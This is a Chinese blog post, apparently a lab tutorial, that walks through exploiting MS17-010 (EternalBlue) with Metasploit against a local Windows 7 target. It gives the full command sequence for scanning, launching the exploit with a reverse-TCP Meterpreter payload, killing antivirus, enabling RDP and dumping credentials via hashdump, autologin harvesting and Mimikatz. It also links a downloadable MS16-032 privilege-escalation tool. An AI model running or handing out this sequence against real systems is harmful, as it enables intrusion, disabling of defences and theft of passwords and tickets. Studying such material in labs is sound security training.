Metersploit 集成了渗透阶段的全部利用,从漏洞探测,到漏洞利用,最后到后渗透阶段。本次博客主要抛砖引玉,通过对MS17_010漏洞的复现,来学习Metasploit。

漏洞环境:

靶机:windows 7 (192.168.0.135)

攻击机:kali 2018 (192.168.0.133)

开始之前先来熟悉 Metaspolit 基本术语:

Auxiliaries(辅助模块),Exploit(漏洞利用模块),Payload(攻击载荷模块),Post(后期渗透模块),Encoders(编码工具模块)

1.加载smb扫描模块

msf > search auxiliary/scanner/smb

23.通过MS17_010来学习msf对渗透的利用-LMLPHP

发现可利用的smb_ms17_010模块

2.加载漏洞扫描模块对ip段进行漏洞扫描:

msf > use auxiliary/scanner/smb/smb_ms17_010

msf > set rhosts 192.168.0.100-150

msf > set threads 10

msf > run

23.通过MS17_010来学习msf对渗透的利用-LMLPHP

发现 192.168.0.135 这台主机可能存在MS17_010漏洞

3.利用nmap对漏洞主机进行探测:

msf > nmap -T4 -A 192.168.0.135

23.通过MS17_010来学习msf对渗透的利用-LMLPHP

发现敏感端口139,445开启

4.搜索MS17_010可利用漏洞模块

msf > search ms17_010

(没有的话 git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git)

23.通过MS17_010来学习msf对渗透的利用-LMLPHP

5.加载漏洞利用模块,设置参数

msf > use exploit/windows/smb/ms17_010_eternalblue

msf > set lhost 192.168.0.133

msf > set rhost 192.168.0.135

msf > set payload windows/x64/meterpreter/reverse_tcp

msf > exploit

23.通过MS17_010来学习msf对渗透的利用-LMLPHP

可以看到漏洞利用成功,现在是 system 最高权限

6.信息查看

进程迁移:

因为shell都是不稳定的,所以需要找到一个可靠的进程,迁移过去:

migrate 要迁移的进城号

查看系统信息:

meterpreter > sysinfo

23.通过MS17_010来学习msf对渗透的利用-LMLPHP

查看是否为虚拟机:

meterpreter > run post/windows/gather/checkvm

23.通过MS17_010来学习msf对渗透的利用-LMLPHP

查看目标机运行时间:

meterpreter > idletime

23.通过MS17_010来学习msf对渗透的利用-LMLPHP

查看完整网络设置:
meterpreter > route

23.通过MS17_010来学习msf对渗透的利用-LMLPHP

关闭杀毒软件:

meterpreter > run post/windows/manage/killav

23.通过MS17_010来学习msf对渗透的利用-LMLPHP

启动目标机的远程桌面协议,开启3389端口:

meterpreter > run post/windows/manage/enable_rdp

23.通过MS17_010来学习msf对渗透的利用-LMLPHP

可以看到已经成功启动了远程桌面。

列举当前登陆过的用户:

meterpreter > run post/windows/gather/enum_logged_on_users

23.通过MS17_010来学习msf对渗透的利用-LMLPHP

可以看到有 SecEvery,Administrator两个用户。

列举安装在目标机上的应用程序:

meterpreter > run post/windows/gather/enum_applications

23.通过MS17_010来学习msf对渗透的利用-LMLPHP

将当前Meterpreter终端隐藏在后台:

meterpreter > background

23.通过MS17_010来学习msf对渗透的利用-LMLPHP

需要重新调用终端:

meterpreter > sessions -i 1

23.通过MS17_010来学习msf对渗透的利用-LMLPHP

很多用户习惯将计算机设置为自动登陆,下面这个命令可以抓取自动登陆的用户名和密码:

meterpreter > run windows/gather/credentials/windows_autologin

23.通过MS17_010来学习msf对渗透的利用-LMLPHP

下载c盘下1.txt文件到/home目录下:

meterpreter > download c:\txt /home

上传/home目录下1.txt文件到c盘下:

meterpreter > upload /home/1.txt c:\

密码抓取:

1.使用Hashdump抓取密码

Hashdump Meterpreter脚本可以从目标机中提取Hash值,破解Hash值即可获得登陆密码。计算机中的每个账号(如果是域服务器,则为域内的每个账号)的用户名和密码都存储在sam文件中,当计算机运行时,该文件对所有账号进行锁定,要想访问就必须有“系统级”账号。所以要使用改名了就必须进行权限提升。

在Meterpreter Shel提示符下输入hashdump命令,将导出目标机sam数据库中的Hash:

23.通过MS17_010来学习msf对渗透的利用-LMLPHP

2.使用Mimikatz抓取密码

加载mimikatz模块:

meterpreter > load mimikatz

23.通过MS17_010来学习msf对渗透的利用-LMLPHP

看了大概使用方法后,既可以使用Metasploit内建的命令,也可以使用Mimikatz自带的命令从目标机器上导出Hash和明文证书。

抓取系统Hash:

meterpreter > msv

23.通过MS17_010来学习msf对渗透的利用-LMLPHP

md5解密:

23.通过MS17_010来学习msf对渗透的利用-LMLPHP

抓取系统票据:

meterpreter > kerberos

23.通过MS17_010来学习msf对渗透的利用-LMLPHP

获取系统账户信息:

23.通过MS17_010来学习msf对渗透的利用-LMLPHP

----------------------------------------------------------------------------------

emmmm....为了给这篇文章增加一点营养,这里另附使用MS16_032对 windows 2003 进行溢出提权:

23.通过MS17_010来学习msf对渗透的利用-LMLPHP

另附ms16_032提权小工具:

https://pan.baidu.com/s/141N6rXVO7mGvuXfp5UzzBA

提取码:yavh      解压码: 96sec.org

参考链接:

https://xz.aliyun.com/t/2536

https://www.cnblogs.com/lsgxeva/p/8450277.html

https://www.cnblogs.com/backlion/p/6804863.html

http://www.96sec.org/blog/post/243.html

05-23 16:25